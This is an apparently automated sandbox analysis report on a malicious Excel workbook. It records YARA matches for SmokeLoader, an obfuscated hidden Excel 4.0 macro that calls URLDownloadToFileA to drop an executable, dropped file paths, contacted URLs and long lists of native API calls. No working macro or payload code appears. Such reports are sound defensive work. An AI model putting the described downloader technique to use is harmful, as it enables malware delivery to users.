                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dataservice.o365filtering.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://devnull.onenote.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://directory.services.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://graph.ppe.windows.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://graph.ppe.windows.net/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://graph.windows.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://graph.windows.net/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                      Source: A185.exe, dmxhr.exe, 00000017.00000003.378395734.00000000011A0000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.org/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://lifecycle.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://login.microsoftonline.com/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://login.microsoftonline.com/common
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://login.windows.local
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://management.azure.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://management.azure.com/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://messaging.office.com/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ncus-000.contentsync.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://officeapps.live.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://onedrive.live.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://onedrive.live.com/embed?
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://powerlift-user.acompli.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://powerlift.acompli.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://settings.outlook.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://shell.suite.office.com:1443
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.com/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.de/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://tasks.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://wus2-000.contentsync.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://www.odwebp.svc.ms

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 00000013.00000002.395141332.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.382516594.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.323021071.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.277473302.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.Msysprotect.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.bijvfaa.a30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Msysprotect.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.bijvfaa.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.bijvfaa.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.Msysprotect.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: A185.exe, 00000012.00000002.376906323.0000000000C7A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_00403E80 CryptImportKey,CryptExportKey,CryptDestroyKey,18_2_00403E80

                      System Summary:

                      barindex
                      Found malicious Excel 4.0 MacroShow sources
                      Source: Document 8402.xlsbInitial sample: URLDownloadToFileA
                      Found Excel 4.0 Macro with suspicious formulasShow sources
                      Source: Document 8402.xlsbInitial sample: CALL
                      Source: Document 8402.xlsbInitial sample: CALL
                      Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                      Source: Document 8402.xlsbInitial sample: Sheet size: 502841
                      Found obfuscated Excel 4.0 MacroShow sources
                      Source: Document 8402.xlsbInitial sample: High usage of CHAR() function: 129
                      Office process drops PE fileShow sources
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Gm238uw8\Fzr3bP\Msysprotect.exeJump to dropped file
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\15[1].gifJump to dropped file
                      Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exeCode function: 4_2_00401749 Sleep,NtTerminateProcess,4_2_00401749
                      Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exeCode function: 4_2_00401756 Sleep,NtTerminateProcess,4_2_00401756
                      Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exeCode function: 4_2_00401761 Sleep,NtTerminateProcess,4_2_00401761
                      Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exeCode function: 4_2_004015FF Sleep,NtTerminateProcess,4_2_004015FF
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9780 ZwMapViewOfSection,LdrInitializeThunk,19_2_673F9780
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9600 ZwOpenKey,LdrInitializeThunk,19_2_673F9600
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9660 ZwAllocateVirtualMemory,LdrInitializeThunk,19_2_673F9660
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F99A0 ZwCreateSection,LdrInitializeThunk,19_2_673F99A0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9820 ZwEnumerateKey,LdrInitializeThunk,19_2_673F9820
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9860 ZwQuerySystemInformation,LdrInitializeThunk,19_2_673F9860
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F98C0 ZwDuplicateObject,LdrInitializeThunk,19_2_673F98C0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,19_2_673EE730
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9730 ZwQueryVirtualMemory,19_2_673F9730
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67445F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,19_2_67445F5F
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488F6A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6744176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,19_2_6744176C
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9710 ZwQueryInformationToken,19_2_673F9710
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,19_2_6746CF70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E9702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,19_2_673E9702
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9F70 ZwCreateIoCompletion,19_2_673F9F70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9770 ZwSetInformationFile,19_2_673F9770
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67446715 memset,memcpy,ZwTraceEvent,19_2_67446715
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673ECF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,19_2_673ECF6A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B6F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,19_2_673B6F60
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAF60 ZwSetTimer2,19_2_673FAF60
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9750 ZwQueryInformationThread,19_2_673F9750
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,19_2_673E174B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746CF30 ZwAlertThreadByThreadId,19_2_6746CF30
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,19_2_673F0F48
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9740 ZwOpenThreadToken,19_2_673F9740
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_673B2FB0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F97A0 ZwUnmapViewOfSection,19_2_673F97A0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,ZwUnmapViewOfSection,19_2_673F3FA0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EFF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,19_2_673EFF9C
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67440FEC ZwDuplicateObject,ZwDuplicateObject,19_2_67440FEC
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673C0FFD RtlInitUnicodeString,ZwQueryValueKey,19_2_673C0FFD
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67465F87 ZwUnmapViewOfSection,19_2_67465F87
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67445780 DbgPrompt,ZwWow64DebuggerCall,19_2_67445780
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E37EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,19_2_673E37EB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EDFDF ZwAlertThreadByThreadId,19_2_673EDFDF
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAFD0 ZwShutdownWorkerFactory,19_2_673FAFD0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673BF7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,19_2_673BF7C0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F97C0 ZwTerminateProcess,19_2_673F97C0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673BB630 ZwWaitForKeyedEvent,19_2_673BB630
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9E30 ZwCancelWaitCompletionPacket,19_2_673F9E30
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67446652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,19_2_67446652
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9E20 ZwCancelTimer2,19_2_673F9E20
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673BC600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,19_2_673BC600
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAE70 ZwSetInformationWorkerFactory,19_2_673FAE70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9670 ZwQueryInformationProcess,19_2_673F9670
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67442E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67442E14
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EBE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,19_2_673EBE62
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67483E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,19_2_67483E22
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FB650 RtlUnhandledExceptionFilter,ZwTerminateProcess,19_2_673FB650
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9650 ZwQueryValueKey,19_2_673F9650
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6746FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6746FE3F
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FB640 RtlUnhandledExceptionFilter,ZwTerminateProcess,19_2_673FB640
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DE6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,19_2_673DE6B0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488ED6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EDE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,19_2_673EDE9E
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2E9F ZwCreateEvent,ZwClose,19_2_673B2E9F
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6740DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,19_2_6740DEF0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B3E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_673B3E80
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_674416FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,19_2_674416FA
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673C76FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,19_2_673C76FE
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DE6F9 ZwAlpcSetInformation,19_2_673DE6F9
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673BB6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,19_2_673BB6F0
